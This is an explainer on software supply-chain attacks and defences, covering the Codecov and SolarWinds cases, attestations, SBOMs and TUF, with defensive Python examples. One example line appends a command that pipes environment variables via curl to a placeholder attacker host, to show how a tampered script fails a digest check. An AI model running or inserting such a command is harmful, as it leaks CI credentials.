What Is a Software Supply-Chain Attack?

Learn what a software supply-chain attack is, how it spreads through trusted build and update paths, and which controls reduce the risk.

Introduction

A software supply-chain attack compromises software before users install or update it, so the attacker can ride along trusted delivery paths instead of breaking into each target separately. That is what makes these attacks unusually efficient and unusually hard to spot: the victim often receives the malicious code through the same channel they normally rely on for security updates, dependency downloads, build automation, or release artifacts.

NIST’s glossary, drawing from CNSSI 4009-2015, defines a supply-chain attack broadly as an attack that uses implants or other vulnerabilities inserted prior to installation to infiltrate data or manipulate hardware, software, operating systems, peripherals, or services at any point in the life cycle. That breadth matters. The core idea is not merely “malicious package” or “bad update.” It is that an adversary interferes upstream and then benefits from the trust relationships that already exist downstream.



If ordinary intrusion is like picking the lock on one house, a supply-chain attack is more like tampering with locks at the factory so that every lock shipped already opens to the attacker’s key. The analogy helps explain scale and inherited trust, but it fails in one important way: software supply chains are not linear factories. They are dense networks of source repositories, maintainers, CI systems, package registries, artifact stores, signing services, update channels, and deployment pipelines. That complexity is exactly why the problem is difficult.

How do software supply-chain attacks differ from conventional intrusions?

The crucial distinction is this: a software supply-chain attack does not primarily attack the final victim’s perimeter. It attacks the process by which software becomes trusted. In practical terms, the adversary compromises some combination of an artifact, a build step, or an actor, and then lets normal engineering and deployment behavior propagate that compromise.

NIST SP 800-204D describes this clearly as a three-stage process. First comes compromise: the attacker tampers with an element of the software supply chain, such as source code, a dependency, a build server, a storage bucket, an update signing process, or a maintainer account. Then comes propagation: because other systems treat that compromised element as legitimate, the malicious change moves through build, packaging, distribution, and deployment. Finally comes exploitation: the attacker uses the delivered access for persistence, command execution, data theft, or further lateral movement.

This three-stage view is more useful than a long list of attack types because it reveals the invariant. The invariant is not any specific technique. The invariant is upstream compromise plus downstream trust. Once you see that, many incidents that look different on the surface turn out to share the same mechanism.

What components and steps make up the software supply chain?

People often imagine the software supply chain as “developers write code, then ship it.” That is too simple to explain the risk. A software supply chain is better understood as the set of steps that create, transform, verify, package, sign, store, publish, update, and deploy software artifacts. NIST frames software supply chains this way: the chain includes the activities whose security strongly affects the security of the end result.

That means the supply chain includes more than source code. It includes dependency manifests, package manager behavior, build scripts, compiler settings, CI runners, container base images, artifact registries, cloud storage, provenance records, update metadata, signing keys, and deployment automation. A compromise anywhere in that path can matter if downstream consumers rely on it.

This is why software supply-chain security sits between application security and infrastructure security. If a developer workstation is compromised, malicious code can be introduced before review. If a CI system is compromised, clean source can still produce malicious binaries. If an artifact repository or object store is compromised, a legitimate build can be replaced after the fact. If a signing key is compromised, an attacker may be able to distribute malware that appears officially approved.

So the central question is not, “Is the source repository secure?” It is, “What evidence do we have that the artifact we are about to run is the artifact we intended to produce, produced by the process we intended to use?”

How does a software supply-chain attack typically unfold?

| Stage | Attacker aim | Observable sign | Best defender check |
|---|---|---|---|
| Compromise | Insert malicious change | Credential theft or tampered artifact | Verify origin and keys |
| Propagation | Let compromise travel downstream | Mismatch between source and artifact hash | Check provenance attestations |
| Exploitation | Use delivered access in victims | Data exfiltration or anomalous behavior | Monitor runtime and egress |

A worked example makes the mechanism clearer. Imagine a company that publishes a command-line tool used in many CI pipelines. Developers commit source code to a repository. The CI system builds a release artifact, uploads it to cloud storage, and users fetch it in automation. To engineers and customers, this feels routine: the repository is familiar, the CI job is automated, and the download URL is the official one.

Now suppose an attacker steals a credential that can modify the storage location where the release artifact is hosted. The source repository remains untouched. The build logs look normal. The release version number may even stay the same. But the hosted artifact is silently replaced. From the user’s perspective, nothing unusual happened; they fetched from the trusted location they always use. The compromise propagates not because users made an obviously dangerous choice, but because the trusted distribution channel delivered altered software.

That is close to what made the Codecov incident so instructive. Codecov reported that an attacker extracted an HMAC key for a Google Cloud Storage service account from an intermediate layer in a public Docker image, then used that key to modify the Bash Uploader in storage so end users received the altered script. The malicious code extracted environment variables and repository information from CI environments. The important lesson is not just “secrets leaked.” It is that a compromise of distribution integrity turned many normal CI executions into involuntary data exfiltration.
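A swapped hosted artifact is exactly the case a consumer-side digest check is meant to catch. The following is a minimal sketch, assuming the consumer recorded a SHA-256 digest of the reviewed script through some channel other than the download location; the script contents, the `PINNED_SHA256` name, and the attacker URL are hypothetical and are not taken from the incident.

```python
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """Return the SHA-256 digest of data as lowercase hex."""
    return hashlib.sha256(data).hexdigest()


def verify_pinned_digest(artifact: bytes, pinned_hex: str) -> bool:
    """True only if the artifact hashes to the digest pinned out of band."""
    # compare_digest avoids leaking how many leading characters matched.
    return hmac.compare_digest(sha256_hex(artifact), pinned_hex.lower())


# Hypothetical release script and the digest recorded when it was reviewed.
reviewed_script = b"#!/bin/sh\necho uploading coverage\n"
PINNED_SHA256 = sha256_hex(reviewed_script)

# Same URL and file name, but the hosted bytes were replaced.
tampered_script = reviewed_script + b"env | curl -d @- https://attacker.invalid\n"

print(verify_pinned_digest(reviewed_script, PINNED_SHA256))  # True
print(verify_pinned_digest(tampered_script, PINNED_SHA256))  # False
```

The check only helps if the pinned digest travels by a path the attacker does not also control; a digest published next to the artifact in the same bucket would be replaced along with it.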

The same logic appears in build-system compromises, but with a different insertion point. In the SolarWinds incident, attackers trojanized Orion software updates so customers received a digitally signed backdoor through the normal update path. The victim did not need to browse to a suspicious site or install an obviously rogue package. The attack succeeded because the update channel itself was trusted.

These examples show why supply-chain attacks can be so efficient. The attacker spends effort once, upstream, and gains access many times, downstream.

Why are trusted updates and dependencies high-risk attack surfaces?

Software ecosystems are built to make reuse easy. Package managers fetch dependencies automatically. CI/CD systems rebuild and redeploy on commit. Update systems are designed to keep users current without friction. These are good features. They reduce patch delay, improve productivity, and scale maintenance. But they also create concentrated trust points.

A concentrated trust point is any place where many consumers accept software based on a shared assumption. That assumption might be “this package comes from the official registry,” “this artifact was built by our CI,” or “this update is signed by the vendor.” Attackers look for these points because compromising one of them can give them leverage over many targets.

NIST SP 800-161 emphasizes that modern software is often assembled from multi-tier commercial and open-source components. That multi-tier structure creates both visibility problems and inherited risk. A product may depend on a direct library, which depends on another package, which embeds another component, and so on. Each tier can introduce vulnerabilities or malicious tampering that are hard for the final consumer to observe directly.

This is also why software supply-chain attacks are related to, but not identical with, ordinary vulnerability management. A vulnerable dependency is not automatically evidence of an attack. NIST SP 800-204D explicitly distinguishes defects from supply-chain attacks: a supply-chain attack involves a malicious party tampering with steps, artifacts, or actors in the chain. The difference matters because defenses must address both accidental weakness and intentional manipulation.
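To make the multi-tier point concrete, the sketch below walks a small dependency graph and separates direct dependencies from transitive ones. The graph and every package name in it are hypothetical; a real project would derive this data from its package manager's lock file or resolver output.

```python
from collections import deque

# Hypothetical dependency graph: package -> direct dependencies.
DEPENDENCIES = {
    "app": ["web-framework", "json-lib"],
    "web-framework": ["http-core", "template-engine"],
    "http-core": ["tls-wrapper"],
    "template-engine": [],
    "json-lib": [],
    "tls-wrapper": [],
}


def dependency_depths(graph: dict[str, list[str]], root: str) -> dict[str, int]:
    """Breadth-first walk: shortest distance from root to each reachable package."""
    depths = {root: 0}
    queue = deque([root])
    while queue:
        package = queue.popleft()
        for dep in graph.get(package, []):
            if dep not in depths:  # first visit is the shortest path in BFS
                depths[dep] = depths[package] + 1
                queue.append(dep)
    del depths[root]  # the root is not its own dependency
    return depths


depths = dependency_depths(DEPENDENCIES, "app")
direct = sorted(name for name, d in depths.items() if d == 1)
transitive = sorted(name for name, d in depths.items() if d > 1)
print("direct:", direct)          # ['json-lib', 'web-framework']
print("transitive:", transitive)  # ['http-core', 'template-engine', 'tls-wrapper']
```

In this toy graph the application author chose two packages but runs five, and `tls-wrapper` sits three tiers away from any decision the author made directly.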

Where in the software supply chain do attackers usually insert malicious code?

The insertion point can vary, but the underlying logic stays the same. Attackers usually choose places where a small upstream change can survive long enough to be treated as legitimate downstream.

One common route is compromising people. Maintainer, developer, publisher, or employee credentials can be stolen through phishing or other forms of social engineering. Once an attacker has those credentials, they may be able to push code, publish packages, alter CI settings, or access signing systems. This is why supply-chain security is tightly connected to identity security: a trusted actor account is often part of the trust model.

A second route is compromising automation. Build servers, CI runners, release workflows, and artifact stores are attractive because they sit in the narrow waist between development and distribution. NIST warns that developer workstations should not be implicitly trusted as part of the build process because they are at risk of compromise. The deeper point is that builds should happen in hardened, controlled environments precisely because local machines are too easy to tamper with.

A third route is compromising dependencies or update channels. This can mean altering a package, swapping a hosted artifact, inserting a malicious plugin, or abusing update metadata and keys. The target is not always the application itself; often it is the mechanism by which applications fetch what they need.

These categories overlap. An attacker might phish a maintainer, use that access to alter CI, and then abuse the update channel to distribute the result. Thinking in terms of a single “type” of attack can therefore be misleading. What matters is where trust enters the system and how the attacker captures it.

Why are supply-chain attacks often difficult to detect?

Supply-chain attacks are hard to detect because they often preserve the appearance of normal operations. The package comes from the expected registry. The update is served from the legitimate domain. The binary may even be signed. Network activity may resemble ordinary application traffic. In SolarWinds, the SUNBURST backdoor was embedded in a digitally signed Orion component and disguised its communications as legitimate Orion Improvement Program traffic after an initial dormant period.

This means conventional defensive instincts can fail. Many teams are good at spotting software from unknown origins, but supply-chain attacks often come from known origins whose integrity has been subverted. The question shifts from “is this source familiar?” to “can we verify that this artifact really came from the claimed process, with the claimed inputs, under the claimed controls?”

There is also a timing problem. By the time malicious behavior is noticed at runtime, the compromise may have happened much earlier: in code review, dependency resolution, CI execution, artifact storage, or metadata generation. Post-incident forensics then become difficult because each transformation step may have incomplete logs or weak provenance.

What evidence and attestations should defenders require to trust an artifact?

| Attestation | Proves | Evidence form | Used to |
|---|---|---|---|
| Environment | Where build ran | Signed environment claim | Ensure hardened build |
| Process | Which steps ran and order | Signed provenance log | Validate workflow controls |
| Materials | What inputs were used | SBOM or input list | Confirm inputs match policy |
| Artifact | What was produced | Artifact signature and hash | Verify artifact integrity |

A good defense is not built on blind trust in any single step. It is built on verifiable integrity across steps. That phrase can sound abstract, so it helps to make it concrete.

Defenders want to know four things. They want to know what was built, from what materials, by which process, and in which environment. NIST SP 800-204D organizes build attestation in almost exactly these terms: environment attestation, process attestation, materials attestation, and artifact attestation. The goal is to create signed evidence that an artifact was produced the way the producer claims.

That does not eliminate attacks by itself. Evidence can be absent, forged if key management is weak, or ignored by consumers. But it changes the security model. Instead of trusting because “this came from our pipeline,” a verifier can check whether the artifact carries proof that it came from the expected pipeline and whether policy allows artifacts with those properties.

This is the common thread behind modern supply-chain security efforts such as SLSA and in-toto. OpenSSF describes SLSA as incrementally adoptable guidelines for supply-chain security that help producers secure their software supply chains and help consumers decide whether to trust a package. In-toto, by contrast, focuses on making transparent what steps were performed, by whom, and in what order, so users can verify supply-chain integrity from initiation to installation. The tools differ in scope and emphasis, but they converge on the same idea: replace implicit trust with checkable claims.
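The idea of checkable claims can be sketched in a few lines. This is an illustration only, not the SLSA or in-toto format: the statement fields, the `POLICY` values, and the `example.invalid` identifiers are hypothetical, and an HMAC with a shared demo key stands in for the asymmetric signatures that real attestation systems use.

```python
import hashlib
import hmac
import json

# Stand-in for a real signing key (assumption: real systems sign asymmetrically).
DEMO_KEY = b"demo-only-key"

# Hypothetical verifier policy: which builder and source are acceptable.
POLICY = {
    "allowed_builders": {"ci.example.invalid/release-runner"},
    "expected_source": "git.example.invalid/acme/cli",
}


def sign(statement: dict, key: bytes) -> str:
    """Sign a canonical JSON encoding of the statement."""
    payload = json.dumps(statement, sort_keys=True).encode()
    return hmac.new(key, payload, hashlib.sha256).hexdigest()


def verify(artifact: bytes, statement: dict, signature: str, key: bytes) -> list[str]:
    """Return every policy failure found; an empty list means accept."""
    failures = []
    if not hmac.compare_digest(sign(statement, key), signature):
        failures.append("signature does not match statement")
    if statement.get("artifact_sha256") != hashlib.sha256(artifact).hexdigest():
        failures.append("artifact digest differs from attested digest")
    if statement.get("builder") not in POLICY["allowed_builders"]:
        failures.append("builder is not on the allow list")
    if statement.get("source") != POLICY["expected_source"]:
        failures.append("source repository is not the expected one")
    return failures


artifact = b"release-binary-bytes"
statement = {
    "artifact_sha256": hashlib.sha256(artifact).hexdigest(),  # what was built
    "materials": ["json-lib==1.4.2"],                         # from what inputs
    "builder": "ci.example.invalid/release-runner",           # in which environment
    "source": "git.example.invalid/acme/cli",                 # from which source
}
signature = sign(statement, DEMO_KEY)

print(verify(artifact, statement, signature, DEMO_KEY))          # []
print(verify(b"swapped-bytes", statement, signature, DEMO_KEY))  # digest failure
```

The second call fails even though the statement and signature are untouched, which is the point: the verifier's decision rests on the evidence matching the bytes in hand, not on where those bytes were downloaded from.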

What can an SBOM tell you, and what are its limitations for supply-chain security?

| Artifact | Answers | Primary strength | Main limitation |
|---|---|---|---|
| SBOM | What components exist | Visibility of composition | Can be falsified by compromised build |
| Provenance/Attestation | How artifact was produced | Verifiable production claims | Depends on secure key custody |
| Update metadata (TUF) | Is update fresh and authorized | Replay and rollback protection | Requires correct role/key management |

Software bills of materials are often presented as a supply-chain security answer. They are useful, but they are not the whole answer.

An SBOM records components and their relationships, improving visibility into what software contains. CISA guidance describes SBOMs as formal records of a product’s components and provenance, commonly expressed in formats such as SPDX and CycloneDX. That visibility matters because you cannot assess exposure to vulnerable or risky components you do not know are present.

But NIST SP 800-204D is explicit that SBOMs alone are not enough for vulnerability management, and they are not enough to address software defects. More fundamentally, an SBOM is only as trustworthy as the process that generated and delivered it. If an attacker can tamper with the artifact, the build, or the SBOM generation step, a neat inventory may simply document a lie. Recent research has even explored how SBOM generation and consumption workflows can themselves be manipulated, underscoring that transparency artifacts also need integrity protection.

So the right mental model is this. An SBOM answers “what is in this software?” Provenance and attestation answer “where did this artifact come from, and how was it produced?” Update security frameworks answer “how do clients verify what they receive over time?” These are complementary, not interchangeable.
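A short sketch shows both what an SBOM makes possible and where it stops. It assumes a pared-down CycloneDX-style JSON document with a `components` array; the component names and the `AFFECTED` advisory set are hypothetical.

```python
import json

# Minimal CycloneDX-style document; component entries are hypothetical.
SBOM_JSON = """
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.5",
  "components": [
    {"type": "library", "name": "json-lib", "version": "1.4.2"},
    {"type": "library", "name": "tls-wrapper", "version": "0.9.0"}
  ]
}
"""

# Hypothetical advisory feed: (name, version) pairs known to be affected.
AFFECTED = {("tls-wrapper", "0.9.0")}


def declared_components(sbom: dict) -> list[tuple[str, str]]:
    """List (name, version) for every component the SBOM declares."""
    return [(c["name"], c.get("version", "")) for c in sbom.get("components", [])]


def affected_components(sbom: dict, affected: set) -> list[tuple[str, str]]:
    """Declared components that appear in the advisory set."""
    return [c for c in declared_components(sbom) if c in affected]


sbom = json.loads(SBOM_JSON)
print(declared_components(sbom))            # [('json-lib', '1.4.2'), ('tls-wrapper', '0.9.0')]
print(affected_components(sbom, AFFECTED))  # [('tls-wrapper', '0.9.0')]
```

Everything this code reports is what the SBOM declares. Nothing in it checks that the shipped artifact actually contains those components and no others, which is the gap that provenance and attestation are meant to cover.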

Why do software updates need frameworks like TUF instead of simple code signing?

Software updates deserve separate attention because they are one of the most direct trust channels in computing. Users are taught to update promptly. Systems often update automatically. If an attacker can subvert the update mechanism, they gain a path that users and administrators are conditioned to accept.

The Update Framework, or TUF, exists for this reason. TUF is a framework for securing software update systems, and its design starts from a realistic assumption: keys can be compromised, metadata can be replayed, mirrors can be malicious, and clients need a way to distinguish fresh, authorized updates from stale or forged ones.

The mechanism is not just “sign the update.” TUF separates roles such as root, targets, snapshot, and timestamp, and uses threshold signatures so no single compromised key necessarily collapses the whole trust model. It also uses timestamp and snapshot metadata to limit replay and rollback attacks, and recommends especially strong protection for root keys by keeping them offline. Here the principle is important: distribute trust so compromise has limited blast radius. That is a deeper design goal than code signing alone.

NIST’s guidance on software supply-chain security echoes this point by stressing protection of signing and metadata generation, use of secure key management such as HSM-backed protection, and minimizing the impact of key compromise. If your update keys or metadata systems are weak, your software pipeline can remain vulnerable even when your source code and CI look clean.
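Three of the client-side checks described in this section (a signature threshold, rollback rejection, and metadata expiry) can be sketched as follows. This is not the TUF reference implementation or its metadata format: the key IDs, the `THRESHOLD` value, and the metadata fields are hypothetical, and HMAC stands in for the asymmetric signatures TUF uses so the example stays within the standard library.

```python
import hashlib
import hmac
import json
from datetime import datetime, timezone

# Stand-in keys for one role (assumption: real keys would be asymmetric).
ROLE_KEYS = {"key-a": b"secret-a", "key-b": b"secret-b", "key-c": b"secret-c"}
THRESHOLD = 2  # number of distinct valid signatures the role requires


def sign(metadata: dict, key: bytes) -> str:
    """Sign a canonical JSON encoding of the metadata."""
    payload = json.dumps(metadata, sort_keys=True).encode()
    return hmac.new(key, payload, hashlib.sha256).hexdigest()


def valid_signers(metadata: dict, signatures: dict[str, str]) -> set[str]:
    """Key IDs that are trusted for the role and whose signature verifies."""
    return {
        key_id
        for key_id, sig in signatures.items()
        if key_id in ROLE_KEYS
        and hmac.compare_digest(sign(metadata, ROLE_KEYS[key_id]), sig)
    }


def accept_update(metadata: dict, signatures: dict[str, str],
                  last_seen_version: int, now: datetime) -> str:
    if len(valid_signers(metadata, signatures)) < THRESHOLD:
        return "reject: too few valid signatures"
    if metadata["version"] < last_seen_version:
        return "reject: rollback to older metadata"
    if datetime.fromisoformat(metadata["expires"]) <= now:
        return "reject: metadata expired"
    return "accept"


now = datetime(2025, 1, 1, tzinfo=timezone.utc)
fresh = {"version": 8, "expires": "2025-06-01T00:00:00+00:00"}
old = {"version": 5, "expires": "2025-06-01T00:00:00+00:00"}
two_sigs = {k: sign(fresh, ROLE_KEYS[k]) for k in ("key-a", "key-b")}
one_sig = {"key-a": sign(fresh, ROLE_KEYS["key-a"])}
old_sigs = {k: sign(old, ROLE_KEYS[k]) for k in ("key-a", "key-b")}

print(accept_update(fresh, two_sigs, 7, now))  # accept
print(accept_update(fresh, one_sig, 7, now))   # reject: too few valid signatures
print(accept_update(old, old_sigs, 7, now))    # reject: rollback to older metadata
```

The third case is the instructive one: the old metadata carries two perfectly valid signatures, so a client that only checked signatures would accept it. Tracking the last seen version and an expiry date is what turns "was this ever authorized?" into "is this authorized now?".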

What layered defenses reduce software supply-chain risk in practice?

Because supply-chain attacks exploit trust relationships, defenses must be layered across the life cycle rather than concentrated at a single checkpoint. NIST’s broader C-SCRM guidance makes this point at the organizational level: supply-chain risk management is a systematic, enterprise-wide process, not a tool you bolt on at release time.

In practice, that starts with reducing unnecessary trust. Builds should run in hardened, isolated CI environments rather than on developer machines. Credentials for storage, signing, and publishing should be tightly scoped, monitored, and rotated. Artifact repositories and release buckets should be treated as critical infrastructure, not passive storage. Publicly distributed images should avoid leaking secrets in intermediate layers, a lesson highlighted by Codecov’s post-mortem and its move toward squashed or multistage builds.

The next layer is creating and verifying evidence. Generate provenance. Sign artifacts and attestations. Record materials, process, and environment details. Make policy decisions based on that evidence rather than on naming conventions or repository location alone. Tools and standards such as in-toto, SLSA, and secure signing systems aim to make this operationally feasible, although adoption and interoperability are still maturing.

Then comes visibility into composition and consumption. Use SBOMs to know what components are present, but pair them with secure internal repositories, dependency review, and continuous monitoring. CISA’s guidance emphasizes internal package repositories and governance processes for open-source adoption because unmanaged intake of dependencies creates blind spots. The goal is not to eliminate reuse; it is to make reuse observable and governable.

Finally, protect the update path itself. Code signing matters, but so do role separation, metadata freshness, recovery mechanisms, and minimized key blast radius. TUF shows why secure updates require more than a single signature file.

What are the limitations and trade-offs of supply-chain defenses?

It is tempting to think there is a clean technical fix: sign everything, generate an SBOM, and the problem is solved. The evidence does not support that level of confidence.

First, these systems depend on assumptions about trust anchors and key protection. If the keys behind attestations or updates are stolen, or if the verifier trusts the wrong root, the evidence layer can be subverted. Second, transparency is not the same as correctness. An attestation can faithfully describe a bad process. An SBOM can accurately list components in a malicious build. Security improves when evidence is both authentic and tied to a process worth trusting.

Third, adoption is uneven. SLSA is intentionally incrementally adoptable, which is pragmatic but means assurance levels vary widely. NIST SP 800-204D deliberately avoids prescribing exact artifact formats in some areas because the ecosystem is still evolving. That is honest guidance, but it means implementation quality and interoperability can differ substantially between organizations.

And finally, software supply chains are social systems as much as technical ones. Procurement choices, maintainer practices, staffing, key custody, approval workflows, and incident response all shape the attack surface. That is why supply-chain security connects naturally to neighboring topics like social engineering, phishing, and key management. A stolen maintainer credential or leaked signing key can undo elegant technical controls.

Conclusion

A software supply-chain attack works by compromising the path software takes to become trusted, then using that trust to reach downstream victims at scale. The essential pattern is simple: compromise something upstream, let normal distribution propagate it, and exploit the result downstream.

Once you see that pattern, the defenses also make more sense. The job is not merely to scan code for bugs. It is to make each important step in software production and delivery verifiable: who did what, in what environment, from which inputs, with which keys, and whether clients can check those claims before they trust the result. That shift, from assumed trust to evidenced trust, is the idea worth remembering.

Frequently Asked Questions

A supply-chain attack targets the process that makes software trusted - by compromising an upstream element (artifact, build step, or actor) and letting normal distribution propagate the compromise - whereas ordinary intrusions typically attack a single victim’s perimeter directly.

Attackers commonly insert themselves by compromising people (maintainer or developer credentials), automation (CI/build servers, artifact stores), or dependencies/update channels (malicious packages, swapped artifacts, or abused signing/metadata), and these routes often overlap in real incidents.

They are hard to detect because the malicious artifact often arrives via a legitimate registry, signed update, or normal CI job and thus preserves the appearance of normal operations, so defenders must ask whether the artifact actually came from the claimed process rather than just whether the source looks familiar.

An SBOM improves visibility by listing components and relationships so consumers can assess exposure, but it does not by itself prove provenance or prevent tampering - an SBOM is only as trustworthy as the process that generated and delivered it and can be manipulated if the build or delivery steps are compromised.

Provenance and attestation are signed evidence about how an artifact was produced - typically answering what was built, from which materials, by which process, and in which environment - and they let verifiers check that an artifact matches the claimed production process rather than relying on implicit trust.

TUF goes beyond single signatures by separating roles (root, targets, snapshot, timestamp), using threshold signatures, and adding timestamp/snapshot metadata to limit replay and rollback attacks, reducing the blast radius of a single key compromise and improving freshness guarantees for update clients.

Signing and attestations strengthen trust only if their keys and trust anchors are well protected; if signing keys or the verifier’s root trust are compromised, forged evidence can be accepted, so key management (HSMs, offline roots, rotation, role separation) and verifier policy remain critical controls.

Practical defenses are layered: run builds in hardened, isolated CI rather than developer machines; tightly scope and monitor publishing and signing credentials; generate and sign provenance and SBOMs; govern dependency intake (internal repositories, reviews); and adopt standards/tools like SLSA and in-toto to make claims checkable and incrementally improve assurance.
